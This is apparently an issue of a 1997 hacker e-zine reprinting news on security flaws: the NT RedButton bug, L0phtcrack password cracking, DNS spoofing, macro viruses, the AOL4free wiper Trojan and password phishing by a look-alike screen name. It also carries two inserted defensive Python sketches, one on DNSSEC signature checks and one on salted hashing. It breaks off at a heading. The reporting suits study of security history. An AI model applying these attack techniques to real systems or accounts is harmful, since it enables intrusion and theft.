13: AGIS Keeps Mum Over Attack, FBI Inquiry
14: HLO brings chaos to CERT conference
15: 3rd Major NT Bug Found..................... antifire
16: Maryland Starts 10 Digit Dialing........... Scud-O
17: Bell Atlantic/ Nynex merger moves closer... Scud-O
18: Inferno OS Beta Test is Released........... Scud-O

"It's the latest in communications technology."
-Ross, from the motion picture 'Congo'
_____________________________________________________________

How To Hack Social Security

WASHINGTON, D.C.: Want to know your co-worker's salary? How about checking
out how much your new boyfriend is really worth? It's all available on the
Social Security Administration's website with just a few bits of personal
information: Social Security number, mother's maiden name and state of
birth. The site, launched just a month ago, contains complete financial data
on tens of millions of Americans dating back to 1951. The reason behind the
page is primarily financial: The agency thinks that making the information
available on the Web will save millions of dollars in paperwork. Last year,
the SSA mailed some four million financial reports to taxpayers at a cost of
$5.23 each. Delivering the same report over the Internet costs a fraction of
a penny. As usual, the bureaucrats are not very concerned that the site
makes collecting private Social Security information relatively easy. "We
have confidence that in the huge majority of cases, the people requesting
these things are the right people," John Sabo, SSA's director of the
Electronic Services Staff, told USA Today, mysteriously.
_____________________________________________________________

E-Mail Security Warning
(04/08/97; 11:01 a.m. EST)
By Jeff Sweat, InformationWeek

Some versions of the IMAP and POP messaging and mail protocols contain
security holes that can let hackers manipulate Internet applications built
on the protocols and gain unauthorized access to networks, according to the
Computer Emergency Response Team.

The CERT Coordination Center, affiliated with Carnegie Mellon University in
Pittsburgh, has issued a security advisory about the vulnerabilities in
certain versions of the IMAP and POP protocols. Both protocols require root
privileges so the server can access mail protocols.

Although those privileges are typically discarded after log-on, the security
flaws let hackers gain root access to a system through text entered in the
log-on transaction. The hacker, who doesn't require a user account, can then
execute commands on the system through the root privileges.

The vulnerabilities affect IMAP d, IPOP 2d and IPOP 3d. To avoid problems,
CERT recommended that IS organizations install a patch from their application
vendors or upgrade to IMAP 4.0, revision 1. Until then, businesses should
disable IMAP and POP services, CERT said.

©CMP Media, 1996.
_____________________________________________________________

Internet security code said vulnerable to hackers
Wednesday, April 09, 1997 6:49:00 PM EDT
By David Morgan

ATLANTA (Reuter) - The new security protocol for safeguarding credit-card
transactions on the Internet may have to change because the underlying
cryptography is too easy to hack through and too difficult to upgrade, an
expert said Wednesday.

Steve Mott, senior vice president of electronic commerce and new ventures for
MasterCard International, said it could take hackers as little as a year to
break the industry's standard encryption code, which is supposed to render
credit-card numbers unreadable to outsiders on the Internet's World Wide Web.

For that reason, the consortium of technology companies and creditors that
has spent two years developing the Secure Electronic Transaction (SET)
protocol may switch to a faster encryption system called Elliptic Curve,
which is produced by Certicom Corp.

The first complete version of SET, known as SET 1.0, will be available to
software makers June 1 with core cryptography provided by RSA Data Security,
a unit of Security Dynamics Technologies Inc.

"RSA is a very good starting point. But we suspect that in a year or two, the
Kevin Mitnicks of the world will start to figure out ways to hack it," Mott
said. Mitnick is one of the most notorious computer hackers.

"The only way you scale an RSA is to add a lot more bits. You add a lot more
bits and it becomes more complex software in terms of the interaction of the
transaction messages. That's part of what's taken SET so long to start with."

MasterCard has been helping put together merchants with its own member banks
for SET pilot projects in Denmark, Japan, Taiwan, South Africa and the United
States.

Mott told a news conference at the Internet Commerce Expo that the Elliptic
Curve encryption system would make a better encryption core. In fact, he said
it would have been chosen in the first place if developers had known
about it.

"It will fit on a chip card. I think its 160 bits equals security to 1,024
bits of RSA," the credit industry executive said. "We anticipate putting it
into some SET 1.0 pilots in the very near future this year in the U.S."

Far from being disturbed by the possibility of hackers getting through the
current SET cryptography, Mott said SET's developers would "give them an
award and a ribbon and then embody whatever they did as part of the
improvements" in the next version of security standards.

"The current version for SET is as safe as anybody can make it," he said.

©Reuters Ltd.
_____________________________________________________________

Hacker Contest Fails to Crack Mac Web Server
April 12, 1997
By JOE HUTSKO

It was an invitation few hackers could resist, a cracker come-on backed by a
cash prize: Be the first to break into our Web server and alter the home
page, and we'll give you $15,000. But when the dust had settled, the humble
Apple Macintosh Web server was still intact -- a boast that industry giants
and more powerful computers could not match.

Two months have passed since Infinit Information, a systems consulting firm
based in Sweden, posed its digital dare, dubbed "Crack a Mac," offering
100,000 Swedish kroner, or about $15,000, to anyone who could break into its
Macintosh-powered Web server.

In the first week alone, more than 38,000 visitors dropped by to take either
a curious peek or an outright crack at the challenge. But by the time the
contest closed on Thursday, the company's chief executive, Joakim Jardenberg,
said that the cash would go uncollected because no one had managed to crack
into the company's server.

In all, Jardenberg said, people at more than 100,000 computers (as identified
by unique IP addresses) visited the challenge site, sending more than 8
gigabytes of data in their attempts to break in. He said that about 75
percent of the visitors were from the United States, 20 percent were from
Sweden, and the remaining 5 percent were from other nations, including El
Salvador and Mauritius.

The rules of the game were straightforward. Crackers could not physically
attack the computer or company premises; they were required to reach the
Infinit Information Web server through the Internet. "Breaking into our house
would not only mean you would be disqualified from the challenge, you would
also have to deal with our dog and the police,"
the company declared.

Proof of the crack was to be substantiated by altering the company's home
page in whatever way the cracker deemed fit -- graphically, textually,
noisily -- so long as it was "human-readable." To collect the prize, the
winner would be required to describe in detail how the crack was
accomplished, as well as permit Infinit Information to publish (anonymously,
if the winner preferred) its findings.

Jardenberg also asked that anyone who managed to break in not violate the
company's other servers, which it uses to run its business.

The contestants included at least a few heavy hitters, said Jardenberg, who
was inspired by a similar cracker contest, The Security Challenge, that ran
in 1995. Jardenberg listed International Business Machines, Microsoft,
Silicon Graphics Inc., AT&T, Netscape Communications, NASA, and the United
States Army among the higher-profile organizations that tried to break into
his company's server.

Citing high-profile cracker jobs like the attack on the Central
Intelligence Agency's home page last year, Jardenberg stated that the
contest's main objective was to prove the trustworthiness of the Apple
Macintosh as a secure Web server in comparison with Unix-based servers
produced by companies like Sun Microsystems and Silicon Graphics.

There is no such thing as a definitive test of the security of one system
versus another, but the outcome of Jardenberg's challenge clearly gives a lot
of bragging rights to Mac proponents -- especially at a time when the Net is
deluged with horror stories about security weaknesses in both Web servers,
the machines that host sites, and Web browsers, the software that brings the
Web into the user's machine.

Infinit Information's challenge machine was a Macintosh 8500/150 running
StarNine Technologies' WebStar server software.

Having survived its first onslaught of attacks, Jardenberg said the company
is giving its Mac server "a well-deserved break." But it won't be a vacation
long. Jardenberg is promising foiled contestants another crack at the Infinit
Information site in a few weeks.

©The New York Times
_____________________________________________________________

Columnist Who Warned of Net's Collapse Pays Up
Saturday, April 12, 1997 7:41:00 AM EDT

SANTA CLARA, Calif. (Reuter) - A computer pioneer and industry columnist
who predicted -- wrongly -- that the Internet would collapse last year
kept his promise and literally ate his words at a conference room packed
with Net experts and partisans.

"Eat, baby, eat!" the crowd chanted, whooping and clapping, when columnist
Bob Metcalfe tried to keep his pledge by eating a piece of giant cake iced to
look like his column in the trade publication InfoWorld. It didn't fly.

Metcalfe -- who invented Ethernet computer networking and founded networking
company 3Com Corp. -- had promised to eat the words from his December 1995
column predicting a "catastrophic collapse" of the Internet in 1996 if it did
not come to pass.

Metcalfe, who made the vow at a 1995 conference in Boston, argued at the
Sixth International World Wide Web Conference in Santa Clara, Calif.,
Thursday that there had been major outages last year. But he acknowledged the
big collapse had not happened.

When the audience at his closing address Thursday night objected to his cake
gambit, the 51-year-old columnist said, with mock surprise, "I kind of
suspected it would turn ugly."

He then ripped a copy of the column from a back issue of InfoWorld, tore it
into pieces and dropped it into a clear liquid in a blender hidden on stage.
Metcalfe poured the resulting mix into a bowl, sampled the cloudy, pulpy
substance with a spoon then slurped it down to the crowd's cheers.

©Reuters Ltd.
_____________________________________________________________

DNS: The Problematic Phone Book of Cyberspace
by Simson Garfinkel

6:00pm 9.Apr.97.PDT -- Today the Internet's domain name system (DNS)
remains one of the network's weakest links. DNS is the Internet protocol
that translates host names, like www.hotwired.com, into IP addresses, like
204.62.129.1. It's the phone book of cyberspace, but it's riddled with
problems.

Others have chronicled the political problems that the domain name system's
top-down structure has created. Most of these problems involve Network
Solutions Inc. (aka InterNIC), which manages the .com, .mil, .edu, .gov,
.net, and .org top-level domains. NSI has been criticized for its handling of
trademark disputes involving domain names and allegedly monopolistic
practices.

What's worse, the domain name system is fundamentally insecure. By
transmitting rogue packets to a computer, a hacker or information terrorist
can confuse that machine, cajoling it into contacting one machine on the
Internet when it means to reach another. Under certain conditions, a hacker
can use DNS spoofing to break into a computer. DNS spoofing can be used to
redirect or steal electronic mail, intercept pages sent over the World Wide
Web, or impersonate other Web surfers. It's easy, untraceable, and becoming
more common all the time.

Over the past few years, a working group of the Internet Engineering Task
Force has developed an improved DNS - called DNSSEC - that solves the
protocol's underlying security problems. The Department of Defense's Internet
Infrastructure Protection program funded the technical work, which was in
turn carried out by Trusted Information Systems. That organization has made a
working implementation of the protocol freely available for download.

DNSSEC uses public key encryption and digital signatures to certify every
address that's resolved by the DNS system. Each domain is assigned a public
key. When your computer looks up a host in a particular domain, it checks the
signature on the host's response. This eliminates spoofing; the bad guys can
still send you a bogus response, but they can't sign it with the matching
private key.

Besides strengthening the domain name system, DNSSEC can function as a
database for distributing public keys. "Currently there is no protocol
defined for publishing and automatically obtaining a public key for a user, a
Web site, etc. DNSSEC can be used for this," says EFF founder John Gilmore,
who is helping with the effort. "The keys themselves can be VeriSign keys,
DNSSEC keys, Elliptic Curve encryption keys, or whatever."

Getting the Internet to adopt DNSSEC is a three-step process, says Donald
Eastlake, secretary of the DNSSEC working group. First, network
administrators and webmasters need to create public keys and secret keys for
their Internet domains, and store those keys in their DNS servers. Second,
they must modify their nameservers so they provide signed responses whenever
a DNS query is made. Finally, the major server software companies must modify
the resolvers - the programs that run on the desktop and translate domain
names into IP addresses - to verify those signatures. But no company I am
aware of has announced plans to incorporate DNSSEC into its DNS resolvers.

Signature verification also requires use of the RSA patent, and RSA Data
Security hasn't yet given its go-ahead.

But what's most disturbing is that few people in the computer industry - even
those who work with computer security - have even heard about DNSSEC. It will
have to gain a higher profile before it will fly.

©Packet
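
Added example, not part of the Packet article or of any DNSSEC implementation:
a simplified Python model of the three steps described above (zone key,
signed answer, verifying resolver) showing which spoofed answers a resolver
rejects. The function names, the toy textbook-RSA keys built from Mersenne
primes and the 192.0.2.x spoof addresses are constructed assumptions; real
DNSSEC uses its own record formats, padded signatures and a chain of trust.

```python
import hashlib

E = 65537  # public exponent shared by both toy keys


def make_zone_key(p_exp, q_exp):
    """Step 1: create a zone key pair.

    Toy textbook RSA (no padding) over two Mersenne primes, so only the
    standard library is needed. Such a modulus is trivially factorable:
    illustration only, never a real key.
    """
    p, q = 2 ** p_exp - 1, 2 ** q_exp - 1
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))  # modular inverse, Python 3.8+
    return {"public": (n, E), "private": (n, d)}


def rrset_digest(name, rtype, data):
    """Hash a canonical form so letter case and record order do not matter."""
    canon = "|".join([name.lower().rstrip("."), rtype.upper()] + sorted(data))
    return int.from_bytes(hashlib.sha256(canon.encode()).digest(), "big")


def signed_answer(zone_key, name, rtype, data):
    """Step 2: the nameserver attaches a signature to the records it serves."""
    n, d = zone_key["private"]
    return {"name": name, "type": rtype, "data": list(data),
            "sig": pow(rrset_digest(name, rtype, data), d, n)}


def enclosing_zone(name, trust):
    """Longest trusted zone that the queried name falls under, or None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        zone = ".".join(labels[i:])
        if zone in trust:
            return zone
    return None


def resolve(answer, trust):
    """Step 3: the resolver accepts data only if the zone's key verifies it.

    Returns (addresses, reason); addresses is None when the answer is rejected.
    """
    zone = enclosing_zone(answer["name"], trust)
    if zone is None:
        return None, "no trusted key for this name"
    sig = answer.get("sig")
    if sig is None:
        return None, "unsigned answer"
    n, e = trust[zone]
    if not isinstance(sig, int) or not 0 < sig < n:
        return None, "malformed signature"
    expected = rrset_digest(answer["name"], answer["type"], answer["data"])
    if pow(sig, e, n) != expected:
        return None, "signature does not match"
    return answer["data"], "verified"


# Constructed data. The host name and address are the ones the article quotes.
ZONE_KEY = make_zone_key(521, 607)    # held by the hotwired.com nameserver
ROGUE_KEY = make_zone_key(127, 607)   # a key the resolver has no reason to trust
TRUST = {"hotwired.com": ZONE_KEY["public"]}

GENUINE = signed_answer(ZONE_KEY, "www.hotwired.com", "A", ["204.62.129.1"])
REPLAYED = dict(GENUINE, data=["192.0.2.66"])   # real signature, altered data
RESIGNED = signed_answer(ROGUE_KEY, "www.hotwired.com", "A", ["192.0.2.66"])
UNSIGNED = {"name": "www.hotwired.com", "type": "A", "data": ["192.0.2.66"]}

if __name__ == "__main__":
    for label, ans in [("genuine", GENUINE), ("replayed", REPLAYED),
                       ("re-signed", RESIGNED), ("unsigned", UNSIGNED)]:
        print(f"{label:10s}", resolve(ans, TRUST))
```

The protection holds only while the resolver refuses unsigned answers for a
zone it holds a key for; a resolver that falls back to accepting them gains
nothing from the signatures.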
_____________________________________________________________

Viruses Tripled in Past Year

2:54pm 15.Apr.97.PDT -- The National Computer Security Association (NCSA)
says the rate of computer virus infections has tripled over the past year,
with the viruses passing for the most part through Microsoft Word and
spreadsheet attachments sent via email.

The study, released Monday, points to the evolution of viral hacking that
travels through tiny "macro viruses" - written in bits of code - rather than
disks or software which contain larger executable, and therefore dangerous,
code.

"Most really successful viruses are very simple, very quiet and they
hitch-hike on the most commonly spread types of files" like Word documents
and spreadsheets, said Candace Turtle, spokeswoman for Trend Micro Inc., a
maker of antivirus software that sponsored the survey with Microsoft,
Quarterdeck, and Symantec, among others.

The results of the annual survey of 300 organizations - each with more than
500 PCs - show that the infection rate is about 33 per 1,000 computers per
month, up from about 10 per 1,000 last year. The report shows that nearly as
many virus incidents occurred in January 1997 as in the last six months of
1996.

The most common virus over the past year has been the Word.Concept virus,
which travels on Microsoft Word documents and infected 49 percent of all
sites in the survey. The Wazzu virus, another macro virus that embeds itself
in Word documents, was responsible for about one-fifth of all outbreaks,
according to the study.

"'Macro viruses' are a huge industry problem," says Christine Winkel, product
manager at Microsoft, "and we are working closely with the antivirus
community to make [macros] safer." To block viral outbreaks, Word 97, which
shipped in January, alerts users when a document containing a macro is opened
and gives them the choice of enabling the macro or not. "We encourage
people to say 'no' if they're not sure of the source," says Winkel.

©FEED
_____________________________________________________________

Trojan Vigilante Targets AOL Cheats
(4/17/97; 1:00 p.m. EST)
By Douglas Hayward, TechWire

WASHINGTON -- Cheats who attempt to steal Internet access from America
Online are having their hard disks wiped out by a digital vigilante.

A highly dangerous Trojan horse program is circulating on the Internet that
deletes all files on a user's hard disk, researchers at the U.S. Department
of Energy's Computer Incident Advisory Capability unit said Wednesday in an
urgent bulletin. The program masquerades as a piece of illegal software, the
AOL4free.com program, that lets users create fraudulent AOL user accounts.

Established in 1989, the Computer Incident Advisory Capability is a U.S.
government agency that provides computer security services to employees and
contractors of the Department of Energy.

A Trojan horse program differs from a virus in that it must be run by users
to do its damage. Trojan horses cannot automatically duplicate themselves or
spread without human intervention, as viruses do.

"If you are E-mailed this file, or if you have downloaded it from an online
service, do not attempt to run it," the agency said. "If the program was
received as an attachment to an E-mail message, do not double-click [to open]
it. Opening an attached program runs that program, which in this case deletes
all the files on your hard drive," the agency said.

The AOL4free Trojan horse, which is just 933 bytes long, tells users that
"Your computer has just been f***ed by *VP* f*** you AOL-lamer" while
deleting all files on the user's hard disk using the DOS DelTree command. But
pressing the Control and C keys before the Trojan horse has finished deleting
the files will let users recover some files -- as long as they have programs
that recover deleted files, the agency said.

The agency also told users not to be lulled into a false sense of security by
a message circulated earlier this year that said it was not true the AOL4free
program contained a virus. "That warning was either a hoax or a badly
misunderstood description of this Trojan horse," it said.

"A lot of people will think this kind of Trojan horse serves the user right
because it punishes people who are trying to do something illegal," said Neil
Barrett, a consultant on computer security with Groupe Bull and the author of
"Digital Crime: Policing The Cybernation," a book published earlier this
year. "Their attitude will be that this is actually a rather jolly piece of
software. But the fact is digital vigilantes can do as much damage --
including damage to innocent people -- as real-life vigilantes can do."

Such serve-you-right attacks are becoming particularly popular among digital
vigilantes targeting pedophiles on the Net, Barrett added. "We have come
across cases where people have set up Websites that appear to be pedophile
sites, with the intention of attracting pedophiles and then capturing their
IP addresses. The people who set the sites up then attack people who have
visited the site by planting viruses on them or by denial-of-service
attacks," he said.

"Whatever you think about pedophiles or people who defraud organizations like
AOL, the fact is that causing damage to computers is a criminal offense in
most countries," Barrett said. "This kind of thing [Trojan horses] can also
affect innocent users."

Because the rogue AOL4free program is a Trojan horse, experts say, it will
spread slowly and its origins will be relatively easy to trace, making it
unlikely to become a major menace. And though the agency said the program is
circulating on the Net, antivirus researchers say it has made no real impact
as yet.

"We have not had any reports from users being hit by this program, so we
don't want people to start panicking about it," said Graham Cluley, a senior
virus expert at U.K.-based security specialist Dr Solomon's Software. "It is
probably going to be a fairly small-scale thing," he said. "There are far
more important things to worry about, like the huge number of macro viruses
around."

©CMP Media, 1996.
_____________________________________________________________

Regional Phone Companies to Offer New Access Technologies for ISPs
April 22, 1997
By SANDEEP JUNNARKAR

While the Federal Communications Commission deliberates on whether to end the
pricing exemption that Internet service providers receive on telephone
service, the regional phone companies plan to release two rounds of new
access technologies in the hopes of luring ISPs off the exempted lines and
onto revenue-generating high-speed lines.

The federal rule, called the Enhanced Service Provider exemption, allows
ISPs, including InternetMCI Dial Access, America Online and the Microsoft
Network, to pay only local business connection rates. The regional phone
companies, commonly known as the Baby Bells, say that this rule denies them
revenues from long-distance communications at the same time that it's
clogging their lines. The FCC began providing this exemption in 1983 to help
foster the growth of the Internet. Phone companies say that the federal
exemption has served its purpose and is now counterproductive.

Several Baby Bells, including Bell Atlantic, NYNEX, and Pacific Bell, plan to
implement new temporary services that they say will alleviate congestion on
the voice networks until they release a family of innovative access
technologies in 1998.

Beginning this summer, NYNEX will market its Internet Access Provider
Service, Bell Atlantic will focus on Internet Protocol Routing Service, and
Pacific Bell will tout its Data Access Gateway. Apart from small technical
variations, these systems are very similar. They involve taking the data
traffic off the voice network near the ISP end of the call, directing it
basically across the floor to a router that connects to a higher-speed frame
relay network.

"This is an approach a lot of the regional Bells seem to be taking to relieve
a lot of the data traffic," said Peter Castleton, managing director for
NYNEX's Data Access Products division. He added that the company's new
service "helps to minimize some of the congestion and provides better and
dedicated access to get to ISPs."

But ISPs are apprehensive about the reliability of the networks offered by
the Bells.

"Our concern about Bell Atlantic's IPRS service, aside from the fact that we
don't know how much it would cost, is that it essentially takes data off our
network and runs it through a local exchange carrier packet switch network,"
said Jill Lesser, deputy director of Law and Public Policy at America
Online, the largest Internet access provider in the United States with more
than 8 million subscribers. "Right now we have ultimate quality control of
our packet network and we like that."

According to one person within the ISP industry, the other reason the ISPs
will not bite is that the proposed services offer no great leap forward over
the existing systems. That person, who spoke on the condition that he not be
identified, said he saw two problems with the phone companies' technologies.
The first is that the data traffic will still have to go through one voice
switch, thereby not considerably lessening congestion, he said. Second, this
service will be available only in one or two hubs in every calling area
rather than in every central office.

"It's only when they deploy this technology in every single central office
that they can take data completely off the voice network," said the industry
source. "They talk about their technology offering less congestion and better
service but at this point it doesn't measure up. Maybe in a couple of years
that would be the case but by that point, hopefully, we are talking about
xDSL technologies."

And certainly everyone appears to be eagerly anticipating xDSL services, the
next round of access technologies. (The "DSL" stands for Digital Subscriber
Loop, while the "x" is a variable that represents the varying speeds and
methods of transmission offered by different companies.)

"The new DSL technologies are expected to drive a wide variety of
applications in education, health care and telecommuting," said Vinton G.
Cerf, who is widely considered one of the fathers of the Internet and who is
now the executive vice president of Internet architecture at MCI. "This
increased capacity allows consumers in homes and businesses to have access to
high-speed services normally requiring expensive fiber optic line
connections."

Applications of the xDSL technologies will include interactive services like
home shopping and banking, multi-party video games, and multimedia education
and entertainment.

In 1998, the Baby Bells, as well as companies like Cisco Systems, plan to
release the xDSL family of access technologies, which use digital signals
across the traditional copper wires -- the lines that connect nearly every
home and business in the United States.

That copper lines can provide high-speed Internet access comes as a surprise
to most users because of the commonly held belief that the narrow bandwidth
of copper can optimally only support voice traffic while causing a data
bottleneck on the Internet.

"The truth is that we have used only 1 percent of the capability of copper;
the other 99 percent of the band has just been sitting idle," said Jeff
Waldhuter, executive director of research and development at NYNEX's Science
and Technology division. "The existing copper pipe infrastructure has the
capability to provide the super highway today."

NYNEX plans to take advantage of this unused portion of the pipes by offering
something called Asymmetric DSL technology by January 1998.

"ADSL is not rocket science," Waldhuter said. "It builds off the technology
of today's analog modems."

According to Waldhuter, ADSL leverages the same advances in modem technology
and uses a larger window of the spectrum on the copper wires. He said:
"It uses 200 times the spectrum on the copper wire than we are currently
using. That is how we can get six to eight megabits over the copper to
individual homes."

NYNEX is working closely with US Robotics, the modem manufacturer, to design
a modem that will initially provide 56K service but that could be used for
ADSL service once it is launched.

"We just met with US Robotics, and they see a tremendous upside opportunity
in the market," Waldhuter said. "They are going to do some aggressive pricing
to bring down the cost so it will be affordable to consumers by the 1998 time
frame."

Cisco Systems recently entered the Digital Subscriber Loop market by
acquiring Telesend, a privately held company that developed a symmetrical
xDSL technology, called IDSL. Cisco claims that users can obtain 128Kbps
connections, double the speed of existing single B channel ISDN data
services and many times faster than 28.8Kbps or 56Kbps modems.

"IDSL can be deployed quite economically because many ISDN devices can
potentially support IDSL with a simple software change," said Andrew
Greenfield, director of Service Provider Infrastructure at Cisco Systems.

Greenfield added that the difference between ADSL and IDSL is that ADSL has a
different bandwidth in each direction. "One common configuration gives you
640 kilobits per second from the customer to the network and 6 megabits in
the reverse direction," he said. "Whereas IDSL is symmetric with 128 Kbps in
both directions."

Companies offering an alphabet soup of xDSL technologies are confident that
the variety of services will be compatible.

"The approach we're going to take is standardizing the backbone data network
off the circuit switch voice network to make sure that it is able to have a
wide variety of DSL technologies plug right into our backbone," Castleton
said. "That is the direction a number of the Ciscos and Bay Networks are
heading."

None of the companies provided clear pricing details.

Cisco's Greenfield offered only that consumers would start seeing something
analogous to business class and coach class service for the Internet.

"There will be a consumer-oriented bandwidth that would be competitively priced
to be affordable to consumers," said John Johnson, a NYNEX spokesman. "And a
business-level bandwidth at a price businesses expect to pay -- one that is
competitive with existing services."

How effective the xDSL technologies will be depends entirely on how widely
they will be available.

"Our ADSL roll-out plans are being finalized, but we will be concentrating on
metropolitan and suburban areas, and other areas of high demand," said
Johnson. "I can't be more specific at this time. But yes, it will be limited
by the weakest link in the chain, wherever that may be."

Before xDSL technologies lure ISPs off the exempted lines, the question of
costs and availability will have to be spelled out.

"It's fine to say these products are available, but our primary concerns are
whether its level of deployment will be close to ubiquity and what the
ultimate cost would be to upgrade," said AOL's Lesser. "We are also concerned
about what upgrades will be necessary from the consumer side because we serve
largely a residential rather than a business market place. If it's not widely
available to our customers, it's not that useful for us to invest in."

With other access technologies on the horizon, such as cable and improved
wireless connections, consumers can only wait to see which become the
standard.

©New York Times
_____________________________________________________________

Hacker Provokes Klan Site Shutdown
by David Lazarus

11:55am 22.Apr.97.PDT -- A hacker named "Joka" managed to get America Online
to briefly shut down a site run by the Texas branch of the Ku Klux Klan over
the weekend, forcing the service to act for security reasons after it had
declined to do so in response to widespread criticism that the site contains
offensive material.

"Somebody was password fishing," AOL spokeswoman Wendy Goldberg said Tuesday.
"They were using a made-up screen name similar to the one for the Klan. When
people register complaints, we pull the screen down."

Simple as that - and exactly as Joka had hoped.

In a newsletter called the AOL List that routinely slams the quality of AOL's
service, David Cassel wrote that he'd spoken with Joka, who explained how he
succeeded in attacking the Klan site by using "the hacker skill of social
engineering."

What Joka did was set up a screen name that closely resembled that of the
Realm of Texas of the KKK. "I went around asking people for their passwords,
hoping that they would report the wrong screen name," he was quoted as
saying.

It worked. Goldberg said a number of complaints were received from members
last Friday that the operator of the Klan site was going around asking for
people's passwords. AOL's security force promptly shut down the Klan site and
launched an investigation.

"We checked and saw it was a made-up screen name," Goldberg said. "When we
saw this, we put the Klan's screen back up." She added that the amount of
time the Klan site was down was not very long.

AOL has drawn considerable flak since Wired News first reported the ongoing
presence of the Klan site on its server - despite the service's crackdown on
other sites deemed offensive or pornographic.

The KKK Realm of Texas site discusses America being "duped by the lies of the
race mixers and mongrelizers," and declares the Klan's commitment to "the
preservation, protection, and advancement of the White race."

Goldberg said the site was reviewed months ago by AOL, and the service
decided to let it stay. "These are difficult judgment calls, and we're making
them on a case-by-case basis," she said. "What we look at is the content and
character of a site."

For his part, Joka figures his shadow Klan operator drew about 200 complaints
after attempting to shake down more than 3,000 AOL members. "Stupid people on
AOL always amaze me," he was quoted as saying.

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

RedButton Lets Anyone Be Everyone
by Michael Stutz

2:57pm 22.Apr.97.PDT -- A serious security hole in Windows NT is the latest
in a recent series of published vulnerabilities in the Microsoft operating
system.

The "RedButton Bug," named for the first program to demonstrate the NT
vulnerability, allows an intruder to bypass the traditional logon procedures
and grants that user access to intimate system information on an NT server.

Normally, entry to an NT machine is obtained by logging on with a valid
username and password combination, or optionally using the guest account, if
enabled. The RedButton Bug exploits an alternate means of access on NT
machines - the anonymous account - which is normally used for
machine-to-machine communication on a network.

Once connected, this account gives users access to all resources available to
the group called "everyone," which is as it sounds, all of the users on the
system. These resources include file shares, of which the default group when
first created is "everyone." Some resources could even be written by the
intruder, allowing the implant of Trojan horses.

The bug was discovered by Andy Baron at Midwestern Commerce Inc., a firm that
specializes in NT security consulting and assessment. A working demo of the
flaw was recently published on NTsecurity.com, the Columbus, Ohio, firm's Web
site.

When run, RedButton demonstrates how the flaw allows users to log on to any
LAN or Internet workstation running Windows NT versions 3.5x or 4.0 for which
they have network access. Users don't have to complete the username or
password fields. Once on the server, a user sees sensitive information about
the host machine, including the name of the administrator account and various
entries in the Windows NT Registry, including a list of users.

The RedButton program runs only on NT machines. "Our goal wasn't to make it
available for all platforms," said MWC director of sales Andy Pozo.

Potentially, the bug can be exploited by any networked computer.

Microsoft officials were unavailable for comment Tuesday despite several
attempts to reach them.

For now, network administrators have no fix, other than disconnecting servers
from the network, a practice that's incongruous with the function of the
machines in the first place. And taking away the anonymous access isn't an
option, said Pozo. "Disabling anonymous access would hinder NT as a useable
networking platform," he said.

Partial fixes are available, including the EVERYONE2USER.EXE program,
developed by David LeBlanc at Internet Security Systems Inc., which changes
resources from the "everyone" group to one called "user group."
Internet-connected machines should have their NetBIOS services unbound from
their Internet interface.

"Microsoft may include a fix to this problem in time for Service Bug 3, but
it could be difficult - this bug affects the basic design of NT," Pozo said.

It would also require the patching of a number of kernel-level subroutines,
he said.

Pozo maintains that the latest breach in Microsoft's heavy-hitting OS does
not mean it's not viable. NT is only showing its youth, he said. "[NT]
doesn't have the 20 years [of security checking] that Unix has."

To hackers, NT's vulnerability stems not from the lack of security but from
the very existence of a security scheme. "NT has a security model, and Unix
doesn't," said Mudge, a hacker at the Boston-based collective L0pht
Communications.

"That's a good thing, but the problem is that so many software vendors tend
to bypass that model - including Microsoft itself," he said, referring to the
oft-alleged tendency of Microsoft to ignore its own security precautions.

And Mudge ought to know. He is the co-author of L0phtcrack, a new tool that
demonstrates Windows NT password insecurities, somewhat analogous to the
Crack utility in the Unix world.

Cracking NT passwords is an easier task than the Unix counterpart because the
NT encryption isn't as thorough. When encrypting passwords, NT makes no use
of a salt, a mathematical function that increases the possibilities for an
encrypted password. And NT only runs through one round of DES encryption for
each password, as opposed to the 24 rounds of its Unix equivalent, Mudge
said.

Thanks to this and some slick code writing, L0phtcrack is currently the
fastest password-cracking tool available for the NT platform.

"Our goal is to be able to brute force a 14-character NT password on a
Pentium Pro 200 in under 24 hours," said co-author and fellow L0pht hacker
Weld Pond.

But it's not the only one. The current issue of Phrack Magazine, one of the
premier security and technology e-journals published by the hacker culture,
demonstrates another program that cracks NT passwords.

©1993-97 Wired Ventures, Inc.
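
Added example, not part of the Wired article and not L0phtcrack's or NT's
code: a Python audit of two constructed credential stores, showing what the
two properties the article names (a per-account salt and repeated rounds)
change for whoever holds the password file. SHA-256 and PBKDF2 are stand-ins
chosen for the sketch; the account names, passwords and function names are
constructed assumptions.

```python
import hashlib
import hmac
import os
from collections import defaultdict


def store_unsalted(password):
    """One pass, no salt: stands in for the weakness the article describes.
    (SHA-256 is used for convenience; it is not NT's actual algorithm.)"""
    return {"scheme": "unsalted", "salt": b"", "rounds": 1,
            "hash": hashlib.sha256(password.encode()).digest()}


def store_salted(password, rounds=25_000):
    """Random per-account salt plus an iterated hash (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return {"scheme": "pbkdf2", "salt": salt, "rounds": rounds, "hash": digest}


def verify(password, rec):
    """Recompute the stored value from the record's own parameters."""
    if rec["scheme"] == "unsalted":
        candidate = hashlib.sha256(password.encode()).digest()
    else:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                        rec["salt"], rec["rounds"])
    return hmac.compare_digest(candidate, rec["hash"])


def shared_hash_groups(db):
    """Accounts whose stored values are identical. Anyone holding the file
    learns these accounts share a password without guessing anything."""
    groups = defaultdict(list)
    for user, rec in db.items():
        groups[rec["hash"]].append(user)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


def work_per_candidate(db):
    """Iterations of the underlying function needed to test ONE candidate
    password against every account: one computation can be reused for all
    records that share the same (salt, rounds) parameters."""
    distinct = {(rec["salt"], rec["rounds"]) for rec in db.values()}
    return sum(rounds for _salt, rounds in distinct)


# Constructed accounts: alice and carol happen to pick the same password.
PASSWORDS = {"alice": "Spring1997", "bob": "t4ng3rine", "carol": "Spring1997"}
WEAK_DB = {user: store_unsalted(pw) for user, pw in PASSWORDS.items()}
STRONG_DB = {user: store_salted(pw) for user, pw in PASSWORDS.items()}

if __name__ == "__main__":
    for name, db in (("unsalted, 1 round", WEAK_DB),
                     ("salted, 25000 rounds", STRONG_DB)):
        print(name)
        print("  shared-password groups:", shared_hash_groups(db))
        print("  work per candidate    :", work_per_candidate(db))
```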
_____________________________________________________________

AOL4FREE Culprit Tells His Tale
by David Cassel

